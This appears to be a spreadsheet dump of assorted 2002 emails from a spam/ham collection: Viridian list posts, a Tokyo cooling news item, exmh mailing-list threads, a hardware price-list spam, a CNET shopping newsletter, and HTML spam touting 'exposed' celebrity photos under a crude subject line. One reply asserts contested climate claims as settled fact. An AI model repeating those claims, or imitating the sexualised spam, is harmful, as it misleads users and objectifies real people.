 From: Scott Vandehey &lt;scot*spaceninja.com &gt;
 http://spaceninja.com/viridian/notebook.html
 From: Bob Morris &lt;bob*bomoco.com&gt;
 http://viridianrepository.com/GlobalCivil/
 From: Anonymous
 http://home.freiepresse.de/befis/zx2000.html
 http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
 http://www.vkb.co.il/
 From: Jim Thompson &lt;jim*musenki.com&gt;
 http://www.simputer.org
 http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.html
 From: Mike Rosing &lt;eresrch*eskimo.com&gt;
 http://www.eskimo.com/~eresrch/viridian
 From: Till Westermayer &lt;till*tillwe.de&gt;
 http://www.westermayer.de/till/projekte/02gcsdl.htm
 From:Duncan Stewart &lt;stewarts*stewarts.org?&gt;
 http://www.stewarts.org/viridian/GCS
 From: R. Charles Flickinger &lt;idlewild*mac.com&gt;
 http://homepage.mac.com/iHUG/GCS2000.html
 From:"Kevin Prichard" &lt;kevin*indymedia.org&gt;
 "I  nominate Rop Gonggrijp's Secure Notebook, which was 
 shown recently at H2K2. (http://www.h2k2.net).
 http://www.nah6.com/
 http://www.nah6.com/nah6-h2k2_files/v3_document.html
 "The premise is both important and hilarious. The Secure 
 Notebook provides a Secure Windows XP installation. 
 Windows has a long history of being secure neither from 
 attack nor privacy incursion, so this is something. 
 "Nothing gets in and nothing gets out, without it being 
 firewalled,  filtered, proxied, and encrypted. How is this 
 done? A modified Debian  Linux boots first, running custom 
 NAH6 crypto device drivers, and then  boots XP within 
 vmware."
 Sincerely yours, 
 Kevin Prichard 
 kevin*indymedia.org
 This contest expires in nine days:  August 15, 2002. 
 ----------------------------------------------------
 Source: Planet Ark
 http://www.planetark.org/dailynewsstory.cfm/newsid/17160/story.htm
 "Cooler Tokyo summers may be just a pipe dream away
 by Elaine Lies
 JAPAN: August 5, 2002
    "TOKYO == In what could be the ultimate in public works 
 projects, a Japanese panel of experts has proposed 
 relieving the misery of steamy Tokyo summers by cooling 
 the huge city with sea water and a labyrinth of 
 underground pipes. 
    "Though summers are hard in any city, Tokyo's narrow 
 streets, hordes of people and clusters of massive 
 skyscrapers, largely unrelieved by greenery, produce a 
 special brand of discomfort.
    "And it gets worse every year.  (((Oh yeah.  You bet it 
 does.))) The number of nights when temperatures stay above 
 25 Celsius (77 Fahrenheit) in Tokyo has doubled over the 
 last 30 years, while average temperatures have shot up by 
 2.9 degrees C over the last century. Relief, however 
 distant, could be on the way.  ((("Great news, weather 
 sufferers!  We live in the high-tech capital of a G-7 
 state!")))
    "At the behest of the Construction Ministry, the panel 
 has drawn up a plan that would use a network of buried 
 pipes, and water pumped from the sea, to cool things down. 
 'In the very best conditions, certain areas could in 
 theory become as much as 2.6 degrees Celsius cooler,' said 
 Yujin Minobe, a ministry planner.
     "The huge air-conditioning systems currently used to 
 cool buildings get rid of the heat they take out of the 
 structure by venting it into the outside air, raising 
 temperatures still further and creating a 'heat island' 
 phenomenon in large cities.  (((Soon whole *cities* will 
 do it and vent their heat straight into the rising seas! 
 Look out, Antarctica.)))
     "Under the plan, this heat would be transferred to 
 water in large underground tanks, and the water then 
 pumped through a six-km (3.7-mile) network of underground 
 pipes to a cooling plant on the Tokyo waterfront.
     "There the heat from this water would be transferred 
 to cooler sea water before the then-cooled water was 
 pumped back through the underground pipes. The sea water, 
 now warmed, would be released into the waters of Tokyo 
 Bay.
     "COSTLY PLAN.  (((That's unsurprising.)))  Minobe said 
 the plan would cover some 123 hectares (304 acres) in the 
 centre of Tokyo, including the Marunouchi business 
 district and the posh Ginza shopping area, and would 
 initially cost around 41 billion yen ($344 million).
     "'Savings on reduced energy usage would eventually 
 help pay for this,' he said.  (((A real nest of ironies 
 here, folks.))) Officials quoted in the English-language 
 Japan Times said energy savings would total more than 1 
 billion yen a year, meaning the system would pay for 
 itself in a bit over 30 years.
     "However, Minobe said many problems remained with the 
 plan, which has only been under discussion since April 
 last year. One of the most serious problems is whether 
 warmer water being returned to Tokyo Bay would damage the 
 fragile marine ecosystem, a point Minobe said still 
 required more study.  (((Give it 30 years and there won't 
 be any ecosystem left to study.)))
     "He said the average temperature cut is likely to be 
 only around 0.4 degrees. 'I'm not even sure people would 
 be able to feel that difference,' he said. Any such plan, 
 however, would likely produce a gleam in the eyes of 
 Japan's huge construction industry, known for its 
 propensity for public works projects. Although several are 
 decried as wasteful, public works projects have long been 
 used by the government in attempts to stimulate the 
 economy.  (((Nice use of the word "attempts.")))
     "Frankly, I think this plan is still really more of a 
 dream than anything else," Minobe said. 
 O=c=O O=c=O O=c=O O=c=O
 TOKYO STAYS COOL
 AS DEADLY HEATWAVE BAKES 
 KOBE, OSAKA, KYOTO
 O=c=O O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t xml:space="preserve">
 For anyone to fully bury global warming, they would have to bury the
 Greens.  A Green once said that if the Spotted Owl hadn't existed they
 would have had to invent it.  So it is with global warming.  Their
 fundamental opposition isn't to a warmer earth, it is to industrial
 civilization.
 The fact that the sattelites didn't match what the global warming
 theorists said should be there is old news.  The news here is that the
 temperature measures via sattelite have gotten even better and they have
 been validated with a different means of measurement.
 Rather than have to defend CO2 concentrations as not causing global
 warming, people who believe in CO2 need a good explanation of the
 "Medieval Warm Period".  Said period was warmer than what we have now,
 and it obvioiusly wasn't caused by CO2.
 In point of fact the predicted global warming due to CO2 is not caused
 DIRECTLY by CO2.  CO2 doesn't trap that much heat.  Water vapor does,
 and if you can get more water vapor in the air due to CO2 then you have
 your warming theory.
 Yet it would seem that the very stability of the earth's climate over
 long periods argues not for an unstable system with positive feedback
 loops but one where negative feedback loops predominate.
 More water vapor can increase temperatuers, but that also leads to more
 clouds.  Clouds both trap heat and reflect it, so it depends a great
 deal on how the cloud formation shakes out.  Most climate models admit
 they do clouds very poorly.
 A good link is:
 http://www.techcentralstation.be/2051/wrapper.jsp?PID=2051-100&amp;CID=2051-
 060302A
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Jim
 &gt; Whitehead
 &gt; Sent: Monday, September 23, 2002 12:23 PM
 &gt; To: Robert Harley; fork@spamassassin.taint.org
 &gt; Subject: RE: Goodbye Global Warming
 &gt; 
 &gt; &gt; Gary Lawrence Murphy wrote:
 &gt; &gt; &gt;and say hello to the cool:  Oooo ... /this/ is going to cause
 &gt; &gt; some stir ...
 &gt; &gt;
 &gt; &gt; Of course not.  Some people just don't want to be confused by the
 facts.
 &gt; 
 &gt; For anyone to fully bury global warming, they would need to explain
 why
 &gt; the
 &gt; dramatic increase in CO2 concentrations are not increasing the global
 &gt; temperature. They would also need to explain why, worldwide, glaciers
 are
 &gt; melting faster than they have previously in the historical record.
 That
 &gt; is,
 &gt; people need more than refutations, they need a compelling alternate
 &gt; explanation (hint: climate variability doesn't cover all the bases).
 &gt; 
 &gt; - Jim
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Folder computed replcomps (and replgroupcomps
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes - I was going to suggest the folder change hooks as well.
 Just have them check for your custom comps file, and generate
 or update them if needed.
 &gt;&gt;&gt;Hal DeVore said:
  &gt; 
  &gt; 
  &gt; &gt;&gt;&gt;&gt;&gt; On Fri, 19 Jul 2002, "J" == J C Lawrence wrote:
  &gt; 
  &gt;   J&gt; What would be great is if I could build the relevant comp
  &gt;   J&gt; file dynamically at runtime.
  &gt; 
  &gt; Sure.  Use the "folder change" hooks.  Create a proc named
  &gt; Hook_FolderChangeSomething (where "Something" is meaningful and 
  &gt; likely to be unique in the universe just in case you distribute 
  &gt; this to others).  Put the proc in a file in your ~/.tk/exmh 
  &gt; directory, regenerate the tclIndex, restart exmh.
  &gt; 
  &gt; In that proc you can do anything you want, like rewrite your
  &gt; ~/Mail/comp file.
  &gt; 
  &gt; 
  &gt; --Hal
  &gt; 
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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Business opportunity!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! 
 This is Kinson Wong from Asia Magic (HK) Ltd company. 
 We got your company information from internet. I would like to take opportunity to introduce our company.
 Our company as a manufacture ourselves. We are supply computer hardware accessories and peripheral such sound card and AGP card.
 We ensure that our productions and projects at maximum quality yield and be able to fulfill different needs of various levels. We are look forward to do business in the future!!
 If you want to reply us, please record: kinson@asiamagic.com
 Now I can offer those quotation to you: 
 Sound Card:
 CMedia  8738 PCI Sound Card                    USD 4.50
 CMedia  8738 PCI Sound Card 5.1 channel        USD 6.50
 Crystal 4281 PCI Sound Card                    USD 4.60
 Crystal 4280 PCI Sound Card                    USD 4.60
 Crystal 4620 PCI Sound Card                    USD 4.50
 Crystal 4236 ISA Sound Card                    USD 4.00
 ESS     1938 PCI Sound Card                    USD 4.90
 ESS     1978 PCI Sound Card                    USD 4.60
 ESS     1989 PCI Sound Card                    USD 5.40
 ESS     1869 ISA Sound Card                    USD 3.60
 Yamaha   715 ISA Sound Card                    USD 4.60
 Yamaha   724 PCI Sound Card                    USD 5.40
 Yamaha   734 PCI Sound Card                    USD 4.80
 Yamaha   740 PCI Sound Card                    USD 5.80
 Yamaha   744 PCI Sound Card                    USD 6.20 
 VGA Card:
 Nvidia Geforce4 Ti4200                                                    USD Coming
 Nvidia Geforce4 Ti4400                                                    USD Coming
 Nvidia Geforce4 Ti4600                                                    USD Coming
 Nvidia Geforce2 MX460     64MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD 111.50
 Nvidia Geforce2 MX460     64MB DDRAM w/TV,Bundled w/PowerDVD              USD 106.50
 Nvidia Geforce2 MX440     64MB DDRAM w/TV,Bundled w/PowerDVD              USD  79.00
 Nvidia Geforce2 MX420     64MB SDRAM w/TV,Bundled w/PowerDVD              USD  58.50
 Nvidia Geforce2 Ti200    128MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD 104.50
 Nvidia Geforce2 Ti200     64MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD  88.50
 Nvidia Geforce2 Ti 2X/4X  64MB DDRAM                                      USD  65.50
 Nvidia Geforce2 MX400     64MB DDRAM w/TV                                 USD  45.00
 Nvidia Geforce2 MX400     64MB DDRAM                                      USD  40.00
 Nvidia Geforce2 MX400     64MB SDRAM w/TV                                 USD  44.50
 Nvidia Geforce2 MX400     64MB SDRAM                                      USD  39.50
 Nvidia Geforce2 MX200     32MB DDRAM w/TV                                 USD  38.50
 Nvidia Geforce2 MX200     32MB DDRAM                                      USD  33.50
 Nvidia Geforce2 MX200     32MB SDRAM w/TV                                 USD  36.00
 Nvidia Geforce2 MX200     32MB SDRAM                                      USD  31.00
 Nvidia Geforce2 MX200     64MB SDRAM w/TV                                 USD  39.00
 Nvidia Geforce2 MX200     64MB SDRAM                                      USD  34.00
 Nvidia TNT M64 2X/4X      32MB SDRAM w/TV                                 USD  28.40
 Nvidia TNT M64 2X/4X      32MB SDRAM                                      USD  23.40
 Nvidia TNT                16MB SDRAM                                       USD   CALL
 Nvidia TNT                 8MB SDRAM                                      USD   CALL
 ATI LT Pro             8MB SDRAM w/TV                     USD   9.50
 ATI IIC                8MB SDRAM                          USD   9.00
 ATI Rage Pro Turbo     8MB SDRAM                          USD   9.00
 ATI Rage 128 Pro      32MB SDRAM                          USD  24.00
 ATI Rage 128 Pro      32MB SDRAM w/TV                     USD   CALL
 ATI Radeon VE 2X/4X   32MB SDRAM                          USD  35.00
 ATI Radeon VE         32MB SDRAM w/CRT                    USD   CALL
 ATI Radeon VE         32MB SDRAM w/CRT+TV+CRT             USD  45.50
 ATI Radeon VE         64MB SDRAM w/TV                     USD   CALL
 ATI Radeon VE         64MB SDRAM w/TV/CRT                 USD   CALL
 ATI Radeon VE         64MB DDRAM w/TV                     USD   CALL
 ATI Radeon 7500LE     64MB DDRAM w/CRT+TV+CRT w/PowerDVD  USD  57.50
 ATI Radeon 7500       64MB DDRAM w/TV/DVI                 USD   CALL
 ATI Radeon 8500       64MB DDRAM w/CRT+TV+CRT w/PowerDVD  USD 135.50
 S3 Savage4 397 4X     32MB SDRAM               USD 20.00
 S3 Trio 3D 368 2X      8MB SDRAM               USD  Call
 SIS 305               32MB SDRAM               USD 19.00
 SIS 315E              32MB SDRAM               USD 21.50
 SIS 6326               8MB SDRAM               USD 10.00
 SIS 6326 PCI           8MB SDRAM               USD 10.50
 Trident 9750           4MB SDRAM               USD  9.50
 Trident 9750 PCI       4MB SDRAM               USD  9.50 
 Network Product:
 Intel(Ambient)PCI 56k Int. Fax Modem w/voice   USD  8.30
 Motorola      PCI 56k Int. Fax Modem w/o voice USD  7.00
 Rockwell      PCI 56k Int. Fax Modem w/voice   USD  8.00
 Rockwell      PCI 56k Int. Fax Modem           USD  7.30
 Realtek       PCI 10/100 8139C Lan Card        USD  3.95
 Realtek       PCI 10/100 8139C Lan Card w/WOL  USD  4.00
 Realtek        PCI 10/100 8139D Lan Card          USD  3.70
 ESS 2838      PCI 56K Int. Fax Modem w/o voice USD  7.00
 Lucent        PCI 56K Int. Fax Modem w/o voice USD  7.60
 Controller Card:
 PCI 4+1 Ports USB 2.0 Controller Card          USD 13.50
 PCI 3+1 Ports Firewire 1394 Controller Card
     (No Cable)                                 USD 12.00
 iLink Cable                                    USD  2.30
 2-Port PCI USB Host Card                       USD  5.50 
 Ulead Video Editor Ver 5.0                     USD  3.80
 All subject final re-confirm. 
 Total order value over USD 10,000. FOBHK
 Below, FORHK.
 Price based on Bulk packing, with Driver and Manuel.
 Best regards
 Kinson Wong
 *********************************************
 ASIA MAGIC (HK) LTD.
 Unit 11, 7/F., Harry Industrial Bldg., 
 49-51 Au Pui Wan Street,
 Fotan, Shatin. N.T. Hong Kong.
 Tel: 852-26982550
 Fax: 852-26983186
 Mobile: 96687523
 E-mail: kinson@asiamagic.com
 Website: www.asiamagic.com
 *********************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_465553448P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Wed, 21 Aug 2002 15:01:07 +0700
 &gt;
 &gt; I kind of doubt that any pre built-in sequence name is going to be
 &gt; very general.   Even "unseen" can be changed (fortunately that one
 &gt; is easy to find in the MH profile - though whether exmh does that,
 &gt; os just uses "unseen" I haven't bothered to find out).
 Until this patch, exmh was full of hardcoded references to unseen.  One of the 
 things I did was to change these to look in the already available global 
 variable with the value in it (which other parts of the code did use).
 Anyway, I've just fixed the performance problem with repeatedly reading the 
 sequences files.  I'll patch it in after I've run it for a while.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_465553448P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZAUVK9b4h5R0IUIRAgV8AJ9XAOd53JpDBiJXxg9ZPGQEqGi7wgCfQpVm
 jYBaO8NsGZ3U9ekRkgC0yyM=
 =Rd3F
 -----END PGP SIGNATURE-----
 --==_Exmh_465553448P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bad Nicknames for Her Vagina.. #9. Black Hole Of Calcutta
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF&gt;
 &lt;div align="center"&gt;&lt;!-- ImageReady Slices (first page1.psd) --&gt; &lt;/div&gt;
 &lt;div align="center"&gt;&lt;/div&gt;
 &lt;TABLE WIDTH=838 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
     &lt;TD ROWSPAN=6&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_01.gif" WIDTH=252 HEIGHT=216 border="0" alt="Isn't She Sexy      Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_022.gif" WIDTH=586 HEIGHT=36 border="0" align="middle" alt="Spied-Her Man's  Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=36&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_03.gif" WIDTH=586 HEIGHT=48 border="0" alt="Mary Jane Watsons aka Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=48&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_04.gif" WIDTH=586 HEIGHT=24 alt="Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=24&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_05.gif" WIDTH=586 HEIGHT=33 alt="THE INCREDIBLY SEXY Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=33&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_06.gif" WIDTH=586 HEIGHT=57 border="0" alt="Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=57&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD ROWSPAN=4&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_07.gif" WIDTH=586 HEIGHT=546 border="0" alt="Her Sexiest Photos &amp;amp; Exposures!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=18&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_08.gif" WIDTH=252 HEIGHT=222 border="0" alt="What A Body     Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=222&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_09.gif" WIDTH=252 HEIGHT=207 border="0" alt="Check Out Those Legs       Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=207&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD ROWSPAN=2&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_10.gif" WIDTH=252 HEIGHT=150 border="0" alt="Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=99&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt;&lt;IMG SRC="http://www.iceypink.com/affil/28510/first-page1_11.gif" WIDTH=586 HEIGHT=51 border="0" alt="Kirsten Dunst &amp;amp; other Celebrities Exposed!!"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.iceypink.com/affil/28510/spacer.gif" WIDTH=1 HEIGHT=51&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- End ImageReady Slices --&gt; 
 &lt;div align="center"&gt; 
   &lt;p&gt;&lt;b&gt;See This Lovely Celbrity &amp;amp; Many More Hot Stars&lt;a href="http://www.iceypink.com/affil/28510/index.htm"&gt; 
     Click Here&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;----------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br&gt;
     &lt;font size="2"&gt;If you would like to opt-out of future promotions &lt;a href="http://www.iceypink.com/affil/28510/optout/index.htm"&gt;click 
     here&lt;/a&gt;&lt;/font&gt;&lt;/b&gt; &lt;/p&gt;
   &lt;/div&gt;
 &lt;div align="center"&gt;&lt;/div&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Looking for the perfect camera for your summer vacation? (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: Electronics Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_elec.gif" width="442" height="60" border="0" alt="CNET Shopper Electronics Newsletter"&gt;&lt;br&gt;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&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 &lt;div align="center"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiUJn7vuIzceCGFySNP8yR" target="new"&gt;
 &lt;img src="http://www.techrepublic.com/images/ads/Valance.sky.charge.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=7f-bn6KIIP67KOaxJK9IO3JewkhBpPR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=94-rOVNQaI7DFX1bNBJ5elUjfr5JQdR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxJr9qjPBz2JQZv91zVMcR" &gt;Palm m515&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8Zrss7paGe5w8PF_jEuwtZR" &gt;Palm i705&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExfrHcK06_4Mc3148lk6dR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOdIzP1VTRnU3P83P5XcR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwytr5UFJeE4rbg6amtIRR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;
 &lt;!-- Vertical Brick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href="http://clickthru.online.com/Click?q=13-NxSZI3XWrJuqFFhssDLfzpHOCeFR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OBLZ2F4EL2t1VlTK8y9R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4ihhMGScvwlGWUTnaNtuR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtzsIZBM9MWz8AtIQwjjsR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDC4WgO-9WhKPAKa1CPIPR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/electronics_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPd2bOXORUywq2NRJSBTeR" &gt;&lt;IMG SRC="http://computers.cnet.com/i/ce/ps/200/9387504_200_1.gif" BORDER=0&gt;&lt;/A&gt;
 										&lt;/TD&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTt5G1ht5zeFOPq1FsnysR" &gt;&lt;B&gt;Canon PowerShot S330 Elph&lt;/B&gt;&lt;/a&gt;&lt;BR&gt;
 											&amp;#149; 2,000,000 pixels&lt;BR&gt;
 											&amp;#149; 2.5 x digital zoom&lt;BR&gt;
 											&amp;#149; 3 x optical zoom&lt;BR&gt;
 											&amp;#149; Built-in flash&lt;BR&gt;
 											&amp;#149; &lt;B&gt;Just &lt;font color="#CC0000"&gt;$338&lt;/font&gt;&lt;/B&gt;
 &lt;br&gt;&lt;img src="/b.gif" width="1" height="10" border="0" alt=""&gt;&lt;br&gt;	
